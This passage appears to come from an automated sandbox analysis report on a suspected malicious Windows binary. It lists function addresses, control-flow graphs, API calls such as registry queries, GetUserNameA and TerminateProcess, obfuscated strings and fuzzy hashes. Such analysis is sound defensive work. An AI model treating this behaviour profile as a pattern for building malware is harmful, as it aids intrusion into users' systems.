                                                                                                                                                                                            • Instruction ID: 43bee921a1f47131904678d18cc2b56cd3f4953dbfa6a90a36fbe94d3fc1478c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 01b78a726bde9690f608c25c0e09999b7137a423ea066f02e269b970c2a618a8
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B63E576D216498AEB07CB38C8467E9FB75BFA6344F14C35AE40477662FB7066C68B00
                                                                                                                                                                                            Function 005498AE Relevance: 28.3, APIs: 4, Strings: 9, Instructions: 5538COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                                                                            • String ID: !yW$7<=<I$@FSYM_;$XSZ]A_;$ctx`9$dszm9$fyyq9$wytpj:$z}7
                                                                                                                                                                                            • API String ID: 3677997916-2810526515
                                                                                                                                                                                            • Opcode ID: e723b7fbb3010b81ed6ef3f8c85c85b929c4e5d7eec414f285c6d59d396f9e50
                                                                                                                                                                                            • Instruction ID: f182f7c80bbb7301c2bc39effc4554991daeb3bb3e1b08d4b5918b32de800a89
                                                                                                                                                                                            • Opcode Fuzzy Hash: e723b7fbb3010b81ed6ef3f8c85c85b929c4e5d7eec414f285c6d59d396f9e50
                                                                                                                                                                                            • Instruction Fuzzy Hash: 59B3F639C256494BEB07DB38D8166D9F778BF66384F50C3AAE405B3562FB3066C68B04
                                                                                                                                                                                            Function 00556600 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 1700 556600-55660d call 55ff7d 1703 55662f-55663b call 556642 ExitProcess 1700->1703 1704 55660f-55661d GetPEB 1700->1704 1704->1703 1706 55661f-556629 GetCurrentProcess TerminateProcess 1704->1706 1706->1703
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,005565FF,00000001,00000000,?,00000001,?,0055CD85), ref: 00556622
                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,005565FF,00000001,00000000,?,00000001,?,0055CD85), ref: 00556629
                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 0055663B
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                                                            • Opcode ID: 2585d474159650da9a509e8d9dc11d5746b106b8f4bf573c853a7d0a3bd71a4b
                                                                                                                                                                                            • Instruction ID: 11afba4255da526af7053fcae6d196394685cc337a88ab9e874d4eef8ddcc37f
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2585d474159650da9a509e8d9dc11d5746b106b8f4bf573c853a7d0a3bd71a4b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6CE04631001148ABCF112B58DC6E9093F29FB52342F404011F8058B231CB75DC8AEB50
                                                                                                                                                                                            Function 0056ADAF Relevance: 13.8, APIs: 9, Instructions: 273COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 1594 56adaf-56addf call 56aafd 1597 56ade1-56adec call 558b13 1594->1597 1598 56adfa-56ae06 call 565ab0 1594->1598 1603 56adee-56adf5 call 558b26 1597->1603 1604 56ae1f-56ae53 call 56aa68 1598->1604 1605 56ae08-56ae1d call 558b13 call 558b26 1598->1605 1614 56b0d4-56b0d8 1603->1614 1611 56ae58-56ae68 1604->1611 1605->1603 1612 56aed5-56aede GetFileType 1611->1612 1613 56ae6a-56ae73 1611->1613 1618 56af27-56af2a 1612->1618 1619 56aee0-56af11 GetLastError call 558af0 CloseHandle 1612->1619 1616 56ae75-56ae79 1613->1616 1617 56aeaa-56aed0 GetLastError call 558af0 1613->1617 1616->1617 1623 56ae7b-56aea8 call 56aa68 1616->1623 1617->1603 1621 56af33-56af39 1618->1621 1622 56af2c-56af31 1618->1622 1619->1603 1633 56af17-56af22 call 558b26 1619->1633 1626 56af3d-56af8b call 5659fb 1621->1626 1627 56af3b 1621->1627 1622->1626 1623->1612 1623->1617 1636 56af8d-56af99 call 56ac77 1626->1636 1637 56afaa-56afd2 call 56a815 1626->1637 1627->1626 1633->1603 1636->1637 1645 56af9b 1636->1645 1643 56afd7-56b018 1637->1643 1644 56afd4-56afd5 1637->1644 1647 56b01a-56b01e 1643->1647 1648 56b039-56b047 1643->1648 1646 56af9d-56afa5 call 55db0e 1644->1646 1645->1646 1646->1614 1647->1648 1649 56b020-56b034 1647->1649 1650 56b0d2 1648->1650 1651 56b04d-56b051 1648->1651 1649->1648 1650->1614 1651->1650 1653 56b053-56b086 CloseHandle call 56aa68 1651->1653 1657 56b0ba-56b0ce 1653->1657 1658 56b088-56b0b4 GetLastError call 558af0 call 565bc3 1653->1658 1657->1650 1658->1657
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0056AA68: CreateFileW.KERNELBASE(00000000,00000000,?,0056AE58,?,?,00000000,?,0056AE58,00000000,0000000C), ref: 0056AA85
                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0056AEC3
                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 0056AECA
                                                                                                                                                                                            • GetFileType.KERNEL32(00000000), ref: 0056AED6
                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0056AEE0
                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 0056AEE9
                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0056AF09
                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0056B056
                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0056B088
                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 0056B08F
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 4237864984-0
                                                                                                                                                                                            • Opcode ID: 4c539c2fc8051c0196bc47cec4a7182b86f1f87712b5fc48867f291bf6e90bd6
                                                                                                                                                                                            • Instruction ID: ba69e0dcb8b7ccb3a1941417c916953a424dc52926e956062a3c52aaa440fc15
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c539c2fc8051c0196bc47cec4a7182b86f1f87712b5fc48867f291bf6e90bd6
                                                                                                                                                                                            • Instruction Fuzzy Hash: 65A13232A041058FDF19AF68DC56BAE3FA0BF46320F14014AE812FB2D1DB358D5ADB52
                                                                                                                                                                                            Function 0055D0A4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 1663 55d0a4-55d0b0 1664 55d157-55d15a 1663->1664 1665 55d0b5-55d0c6 1664->1665 1666 55d160 1664->1666 1668 55d0d3-55d0ec LoadLibraryExW 1665->1668 1669 55d0c8-55d0cb 1665->1669 1667 55d162-55d166 1666->1667 1670 55d13e-55d147 1668->1670 1671 55d0ee-55d0f7 GetLastError 1668->1671 1672 55d154 1669->1672 1673 55d0d1 1669->1673 1674 55d150-55d152 1670->1674 1677 55d149-55d14a FreeLibrary 1670->1677 1675 55d12e 1671->1675 1676 55d0f9-55d10b call 55c718 1671->1676 1672->1664 1673->1674 1674->1672 1680 55d167-55d169 1674->1680 1679 55d130-55d132 1675->1679 1676->1675 1683 55d10d-55d11f call 55c718 1676->1683 1677->1674 1679->1670 1682 55d134-55d13c 1679->1682 1680->1667 1682->1672 1683->1675 1686 55d121-55d12c LoadLibraryExW 1683->1686 1686->1679
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                            • API String ID: 0-537541572
                                                                                                                                                                                            • Opcode ID: 3f4f34e212d94c516a7bba8bbaed6f269770bb8f2bd403aec9942f50b6cb93de
                                                                                                                                                                                            • Instruction ID: d1c2bd4c3c0ebe1ee2da6a4b28cf18e7f87bf4a7738e5e62b937cfcacdd77001
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f4f34e212d94c516a7bba8bbaed6f269770bb8f2bd403aec9942f50b6cb93de
                                                                                                                                                                                            • Instruction Fuzzy Hash: C721D877A01711ABCB314B64DC55A1B3FB8BB157A2F110512FC16A7290E670DD09D6F0
                                                                                                                                                                                            Function 00539DE0 Relevance: 6.1, APIs: 4, Instructions: 67registryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 1687 539de0-539df4 1688 539df6 1687->1688 1689 539df8-539e11 RegOpenKeyExA 1687->1689 1688->1689 1690 539e13-539e21 1689->1690 1691 539e4b-539e65 1689->1691 1692 539e23 1690->1692 1693 539e25-539e43 RegQueryValueExA 1690->1693 1692->1693 1694 539e66-539e89 RegCloseKey 1693->1694 1695 539e45 RegCloseKey 1693->1695 1696 539e90-539e95 1694->1696 1695->1691 1696->1696 1697 539e97-539eae call 531820 1696->1697
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(?,?,00000000,00020019,?,?), ref: 00539E09
                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,000000FF), ref: 00539E38
                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00539E45
                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?), ref: 00539E66
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Close$OpenQueryValue
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1607946009-0
                                                                                                                                                                                            • Opcode ID: 629342a35ed914dec1659d3d6f7d505b420cf048e3f0d0b96021553b37abba61
                                                                                                                                                                                            • Instruction ID: 92735f3a86dbcc0b45baf869c7b269e35429ee1b5e30bff54f8f42f09207d4a8
                                                                                                                                                                                            • Opcode Fuzzy Hash: 629342a35ed914dec1659d3d6f7d505b420cf048e3f0d0b96021553b37abba61
                                                                                                                                                                                            • Instruction Fuzzy Hash: 37216F7410020AAFEB25DF18DC49BA67BB8FF05704F00459CE8568B291D7F1A958DBA1
                                                                                                                                                                                            Function 005448B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 110COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 1741 5448b0-5448ce GetUserNameA 1742 5448d0-5448ed 1741->1742 1743 54490c-54491b 1741->1743 1744 5448f0-5448f5 1742->1744 1745 544921-54492a 1743->1745 1746 5449ec-544a09 1743->1746 1744->1744 1747 5448f7-54490b call 531820 1744->1747 1748 5449c0-5449ea 1745->1748 1749 544930-5449bd 1745->1749 1750 544a10-544a15 1746->1750 1748->1746 1748->1748 1749->1746 1750->1750 1752 544a17-544a2b call 531820 1750->1752
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetUserNameA.ADVAPI32(?,?), ref: 005448C6
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: NameUser
                                                                                                                                                                                            • String ID: A
                                                                                                                                                                                            • API String ID: 2645101109-3554254475
                                                                                                                                                                                            • Opcode ID: bab11965628ffe76859df2c3f25d4e40eef0d8cf596bdf7afd37db625645d596
                                                                                                                                                                                            • Instruction ID: 4d946032dc3a56fa8c5f7cbe9c010bd538ed8b6f16a34c65809f3ee64724c30c
                                                                                                                                                                                            • Opcode Fuzzy Hash: bab11965628ffe76859df2c3f25d4e40eef0d8cf596bdf7afd37db625645d596
                                                                                                                                                                                            • Instruction Fuzzy Hash: 174167799116058FEB06CF78D8163E5BB78EF22388F00C75DE851B7652F771624A9B40
                                                                                                                                                                                            Function 0056AD21 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 1756 56ad21-56ad55 call 5642f4 call 5593c7 1761 56ad57-56ad5a 1756->1761 1762 56ad5c-56ad71 call 56adaf 1756->1762 1763 56ad7b-56ad7f 1761->1763 1765 56ad76-56ad79 1762->1765 1766 56ad81-56ad89 call 55ce37 1763->1766 1767 56ad8a-56ad8e 1763->1767 1765->1763 1766->1767
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                            • String ID: f'V
                                                                                                                                                                                            • API String ID: 269201875-3956680740
                                                                                                                                                                                            • Opcode ID: 281d487da2bb61c23457510c2bd3b4544aa2be80b10df96796662e11b974a315
                                                                                                                                                                                            • Instruction ID: ec415389b3ffccc7a67ad916264bedbd6348f463199ac62576a7fe44cd6f45ed
                                                                                                                                                                                            • Opcode Fuzzy Hash: 281d487da2bb61c23457510c2bd3b4544aa2be80b10df96796662e11b974a315
                                                                                                                                                                                            • Instruction Fuzzy Hash: C6012872C0015AAFCF42AFA8CD059EE7FB5BF48310F144566BD25A31A1E6318A209F91
                                                                                                                                                                                            Function 0055D16B Relevance: 1.6, APIs: 1, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 1778 55d16b-55d193 1779 55d195-55d197 1778->1779 1780 55d199-55d19b 1778->1780 1781 55d1ea-55d1ed 1779->1781 1782 55d1a1-55d1a8 call 55d0a4 1780->1782 1783 55d19d-55d19f 1780->1783 1785 55d1ad-55d1b1 1782->1785 1783->1781 1786 55d1d0-55d1e7 1785->1786 1787 55d1b3-55d1c1 GetProcAddress 1785->1787 1789 55d1e9 1786->1789 1787->1786 1788 55d1c3-55d1ce call 556490 1787->1788 1788->1789 1789->1781
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 1c9e73fbf11435ee47cf81903510c5cff0509b64b2d0b1e20e767f4c5117c430
                                                                                                                                                                                            • Instruction ID: ade1e4ad158987e02c819514af9837c97ae16e44d2e30b49bd2f2af9d4d254e9
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c9e73fbf11435ee47cf81903510c5cff0509b64b2d0b1e20e767f4c5117c430
                                                                                                                                                                                            • Instruction Fuzzy Hash: E301D233600A119F9F21DE69FC69A5A3BE6BBD43217144122FD05CB194DB309849E7A0
                                                                                                                                                                                            Function 00562727 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 1792 562727-56274d call 5624fd 1795 5627a6-5627a9 1792->1795 1796 56274f-562761 call 56ad8f 1792->1796 1798 562766-56276b 1796->1798 1798->1795 1799 56276d-5627a5 1798->1799
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: __wsopen_s
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3347428461-0
                                                                                                                                                                                            • Opcode ID: 112b5184237859e459e1fa231471a9fa29108ea12b5a22f0ad2e8a494b8a389d
                                                                                                                                                                                            • Instruction ID: 4954d849fd3792bf00f1c0c665be58c6204fa98328f5f7c5e36fe0c262d1fce4
                                                                                                                                                                                            • Opcode Fuzzy Hash: 112b5184237859e459e1fa231471a9fa29108ea12b5a22f0ad2e8a494b8a389d
                                                                                                                                                                                            • Instruction Fuzzy Hash: FD111575A0420AAFCF05DF58E945E9A7BF4FF88314F0440A9F809AB251DA30EA15CB65
                                                                                                                                                                                            Function 0056AA68 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 1800 56aa68-56aa8c CreateFileW
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • CreateFileW.KERNELBASE(00000000,00000000,?,0056AE58,?,?,00000000,?,0056AE58,00000000,0000000C), ref: 0056AA85
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                            • Opcode ID: bc4f26548cab29dcdf5fa581062eab4ae9efa999914525678968959c335f1fd2
                                                                                                                                                                                            • Instruction ID: 1e0873d91cab1dbd05821ebf2a20af12b7bfe61106de6bcbf8381365ea1d6510
                                                                                                                                                                                            • Opcode Fuzzy Hash: bc4f26548cab29dcdf5fa581062eab4ae9efa999914525678968959c335f1fd2
                                                                                                                                                                                            • Instruction Fuzzy Hash: 74D06C3201014DFBDF028F84DD06EDA3BAAFB48724F014010FE1856020C772E862AB90

                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                            Function 00567BCD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,2000000B,~V,00000002,00000000,?,?,?,00567EEB,?,00000000), ref: 00567C66
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20001004,~V,00000002,00000000,?,?,?,00567EEB,?,00000000), ref: 00567C8F
                                                                                                                                                                                            • GetACP.KERNEL32(?,?,00567EEB,?,00000000), ref: 00567CA4
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                            • String ID: ACP$OCP$~V
                                                                                                                                                                                            • API String ID: 2299586839-518811989
                                                                                                                                                                                            • Opcode ID: 9108595b67c7a2e53fdbb61d22b546a37b9f5af71e186f9c9d0b9d3119a76269
                                                                                                                                                                                            • Instruction ID: 6ac70a526f2a4cf13a13affff3cd085a83d44ae3672ca193560d324d4fe1fae5
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9108595b67c7a2e53fdbb61d22b546a37b9f5af71e186f9c9d0b9d3119a76269
                                                                                                                                                                                            • Instruction Fuzzy Hash: 05210A32608108EAFB34CF58C909A977FE6FF58B59B668864E80AC7114FB32DD40D350
                                                                                                                                                                                            Function 00567DA2 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0055CA90: GetLastError.KERNEL32(00531920,00000001,00531924,00556D0D,00000001,00000000,00000000,?,0055CD85,00000000,00000000,00000001,00000000,00531920,00000104), ref: 0055CA95
                                                                                                                                                                                              • Part of subcall function 0055CA90: SetLastError.KERNEL32(00000000,00000006,000000FF,?,0055CD85,00000000,00000000,00000001,00000000,00531920,00000104), ref: 0055CB33
                                                                                                                                                                                              • Part of subcall function 0055CA90: _free.LIBCMT ref: 0055CAF2
                                                                                                                                                                                              • Part of subcall function 0055CA90: _free.LIBCMT ref: 0055CB28
                                                                                                                                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00567EAE
                                                                                                                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 00567EF7
                                                                                                                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 00567F06
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00567F4E
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00567F6D
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
